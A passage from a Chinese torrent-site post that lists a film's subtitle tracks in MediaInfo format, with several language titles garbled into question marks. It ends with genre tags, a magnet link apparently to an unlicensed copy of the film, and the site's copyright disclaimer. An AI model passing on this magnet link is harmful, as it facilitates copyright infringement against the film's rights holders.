  735. Stream size                              : 39.2 KiB (0%)

  736. Title                                    : Hrvatski

  737. Language                                 : Croatian

  738. Default                                  : Yes

  739. Forced                                   : No


  740. Text #12

  741. ID                                       : 42

  742. Format                                   : UTF-8

  743. Codec ID                                 : S_TEXT/UTF8

  744. Codec ID/Info                            : UTF-8 Plain Text

  745. Duration                                 : 1 h 34 min

  746. Bit rate                                 : 70 b/s

  747. Count of elements                        : 1310

  748. Stream size                              : 48.5 KiB (0%)

  749. Title                                    : Magyar

  750. Language                                 : Hungarian

  751. Default                                  : Yes

  752. Forced                                   : No


  753. Text #13

  754. ID                                       : 43

  755. Format                                   : UTF-8

  756. Codec ID                                 : S_TEXT/UTF8

  757. Codec ID/Info                            : UTF-8 Plain Text

  758. Duration                                 : 1 h 34 min

  759. Bit rate                                 : 60 b/s

  760. Count of elements                        : 1272

  761. Stream size                              : 42.1 KiB (0%)

  762. Title                                    : Indonesian

  763. Language                                 : Indonesian

  764. Default                                  : Yes

  765. Forced                                   : No


  766. Text #14

  767. ID                                       : 44

  768. Format                                   : UTF-8

  769. Codec ID                                 : S_TEXT/UTF8

  770. Codec ID/Info                            : UTF-8 Plain Text

  771. Duration                                 : 1 h 34 min

  772. Bit rate                                 : 65 b/s

  773. Count of elements                        : 1241

  774. Stream size                              : 45.0 KiB (0%)

  775. Title                                    : Italian

  776. Language                                 : Italian

  777. Default                                  : Yes

  778. Forced                                   : No


  779. Text #15

  780. ID                                       : 45

  781. Format                                   : UTF-8

  782. Codec ID                                 : S_TEXT/UTF8

  783. Codec ID/Info                            : UTF-8 Plain Text

  784. Duration                                 : 1 h 27 min

  785. Bit rate                                 : 101 b/s

  786. Count of elements                        : 1249

  787. Stream size                              : 65.6 KiB (0%)

  788. Title                                    : 日本語

  789. Language                                 : Japanese

  790. Default                                  : Yes

  791. Forced                                   : No


  792. Text #16

  793. ID                                       : 46

  794. Format                                   : UTF-8

  795. Codec ID                                 : S_TEXT/UTF8

  796. Codec ID/Info                            : UTF-8 Plain Text

  797. Duration                                 : 1 h 34 min

  798. Bit rate                                 : 73 b/s

  799. Count of elements                        : 1380

  800. Stream size                              : 50.7 KiB (0%)

  801. Title                                    : ??

  802. Language                                 : Korean

  803. Default                                  : Yes

  804. Forced                                   : No


  805. Text #17

  806. ID                                       : 47

  807. Format                                   : UTF-8

  808. Codec ID                                 : S_TEXT/UTF8

  809. Codec ID/Info                            : UTF-8 Plain Text

  810. Duration                                 : 1 h 34 min

  811. Bit rate                                 : 60 b/s

  812. Count of elements                        : 1263

  813. Stream size                              : 42.2 KiB (0%)

  814. Title                                    : Malaysia

  815. Language                                 : Malay

  816. Default                                  : Yes

  817. Forced                                   : No


  818. Text #18

  819. ID                                       : 48

  820. Format                                   : UTF-8

  821. Codec ID                                 : S_TEXT/UTF8

  822. Codec ID/Info                            : UTF-8 Plain Text

  823. Duration                                 : 1 h 34 min

  824. Bit rate                                 : 59 b/s

  825. Count of elements                        : 1235

  826. Stream size                              : 41.2 KiB (0%)

  827. Title                                    : Norsk?Bokm?l

  828. Language                                 : Norwegian Bokmal

  829. Default                                  : Yes

  830. Forced                                   : No


  831. Text #19

  832. ID                                       : 49

  833. Format                                   : UTF-8

  834. Codec ID                                 : S_TEXT/UTF8

  835. Codec ID/Info                            : UTF-8 Plain Text

  836. Duration                                 : 1 h 34 min

  837. Bit rate                                 : 53 b/s

  838. Count of elements                        : 1119

  839. Stream size                              : 36.7 KiB (0%)

  840. Title                                    : Nederlands

  841. Language                                 : Dutch

  842. Default                                  : Yes

  843. Forced                                   : No


  844. Text #20

  845. ID                                       : 50

  846. Format                                   : UTF-8

  847. Codec ID                                 : S_TEXT/UTF8

  848. Codec ID/Info                            : UTF-8 Plain Text

  849. Duration                                 : 1 h 34 min

  850. Bit rate                                 : 57 b/s

  851. Count of elements                        : 1232

  852. Stream size                              : 39.7 KiB (0%)

  853. Title                                    : Polski

  854. Language                                 : Polish

  855. Default                                  : Yes

  856. Forced                                   : No


  857. Text #21

  858. ID                                       : 51

  859. Format                                   : UTF-8

  860. Codec ID                                 : S_TEXT/UTF8

  861. Codec ID/Info                            : UTF-8 Plain Text

  862. Duration                                 : 1 h 33 min

  863. Bit rate                                 : 65 b/s

  864. Count of elements                        : 1273

  865. Stream size                              : 45.3 KiB (0%)

  866. Title                                    : Português

  867. Language                                 : Portuguese

  868. Default                                  : Yes

  869. Forced                                   : No


  870. Text #22

  871. ID                                       : 52

  872. Format                                   : UTF-8

  873. Codec ID                                 : S_TEXT/UTF8

  874. Codec ID/Info                            : UTF-8 Plain Text

  875. Duration                                 : 1 h 34 min

  876. Bit rate                                 : 62 b/s

  877. Count of elements                        : 1254

  878. Stream size                              : 42.8 KiB (0%)

  879. Title                                    : Brasil?Português

  880. Language                                 : Portuguese

  881. Default                                  : Yes

  882. Forced                                   : No


  883. Text #23

  884. ID                                       : 53

  885. Format                                   : UTF-8

  886. Codec ID                                 : S_TEXT/UTF8

  887. Codec ID/Info                            : UTF-8 Plain Text

  888. Duration                                 : 1 h 34 min

  889. Bit rate                                 : 59 b/s

  890. Count of elements                        : 1190

  891. Stream size                              : 40.8 KiB (0%)

  892. Title                                    : Roman?

  893. Language                                 : Romanian

  894. Default                                  : Yes

  895. Forced                                   : No


  896. Text #24

  897. ID                                       : 54

  898. Format                                   : UTF-8

  899. Codec ID                                 : S_TEXT/UTF8

  900. Codec ID/Info                            : UTF-8 Plain Text

  901. Duration                                 : 1 h 34 min

  902. Bit rate                                 : 94 b/s

  903. Count of elements                        : 1267

  904. Stream size                              : 65.3 KiB (0%)

  905. Title                                    : русский?язык

  906. Language                                 : Russian

  907. Default                                  : Yes

  908. Forced                                   : No


  909. Text #25

  910. ID                                       : 55

  911. Format                                   : UTF-8

  912. Codec ID                                 : S_TEXT/UTF8

  913. Codec ID/Info                            : UTF-8 Plain Text

  914. Duration                                 : 1 h 34 min

  915. Bit rate                                 : 59 b/s

  916. Count of elements                        : 1090

  917. Stream size                              : 41.2 KiB (0%)

  918. Title                                    : Svenska

  919. Language                                 : Swedish

  920. Default                                  : Yes

  921. Forced                                   : No


  922. Text #26

  923. ID                                       : 56

  924. Format                                   : UTF-8

  925. Codec ID                                 : S_TEXT/UTF8

  926. Codec ID/Info                            : UTF-8 Plain Text

  927. Duration                                 : 1 h 34 min

  928. Bit rate                                 : 139 b/s

  929. Count of elements                        : 1273

  930. Stream size                              : 96.2 KiB (0%)

  931. Title                                    : ???

  932. Language                                 : Thai

  933. Default                                  : Yes

  934. Forced                                   : No


  935. Text #27

  936. ID                                       : 57

  937. Format                                   : UTF-8

  938. Codec ID                                 : S_TEXT/UTF8

  939. Codec ID/Info                            : UTF-8 Plain Text

  940. Duration                                 : 1 h 33 min

  941. Bit rate                                 : 62 b/s

  942. Count of elements                        : 1255

  943. Stream size                              : 42.9 KiB (0%)

  944. Title                                    : Türk?e

  945. Language                                 : Turkish

  946. Default                                  : Yes

  947. Forced                                   : No


  948. Text #28

  949. ID                                       : 58

  950. Format                                   : UTF-8

  951. Codec ID                                 : S_TEXT/UTF8

  952. Codec ID/Info                            : UTF-8 Plain Text

  953. Duration                                 : 1 h 34 min

  954. Bit rate                                 : 106 b/s

  955. Count of elements                        : 1331

  956. Stream size                              : 73.2 KiB (0%)

  957. Title                                    : Укра?нська

  958. Language                                 : Ukrainian

  959. Default                                  : Yes

  960. Forced                                   : No


  961. Text #29

  962. ID                                       : 59

  963. Format                                   : UTF-8

  964. Codec ID                                 : S_TEXT/UTF8

  965. Codec ID/Info                            : UTF-8 Plain Text

  966. Duration                                 : 1 h 34 min

  967. Bit rate                                 : 80 b/s

  968. Count of elements                        : 1243

  969. Stream size                              : 55.6 KiB (0%)

  970. Title                                    : Ti?ng Vi?t

  971. Language                                 : Vietnamese

  972. Default                                  : Yes

  973. Forced                                   : No


  974. Text #30

  975. ID                                       : 60

  976. Format                                   : UTF-8

  977. Codec ID                                 : S_TEXT/UTF8

  978. Codec ID/Info                            : UTF-8 Plain Text

  979. Duration                                 : 1 h 34 min

  980. Bit rate                                 : 54 b/s

  981. Count of elements                        : 1281

  982. Stream size                              : 37.5 KiB (0%)

  983. Title                                    : 中文(简体)

  984. Language                                 : Chinese

  985. Default                                  : Yes

  986. Forced                                   : No


  987. Text #31

  988. ID                                       : 61

  989. Format                                   : UTF-8

  990. Codec ID                                 : S_TEXT/UTF8

  991. Codec ID/Info                            : UTF-8 Plain Text

  992. Duration                                 : 1 h 34 min

  993. Bit rate                                 : 50 b/s

  994. Count of elements                        : 1298

  995. Stream size                              : 34.8 KiB (0%)

  996. Title                                    : 中文(繁體)

  997. Language                                 : Chinese

  998. Default                                  : Yes

  999. Forced                                   : No



TAGS 冒险 动画 喜剧 歌舞

磁力链:
  • magnet:?xt=urn:btih:0D4DD87D29E0D3C6063B98EFFF14C282B68D9CDA
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回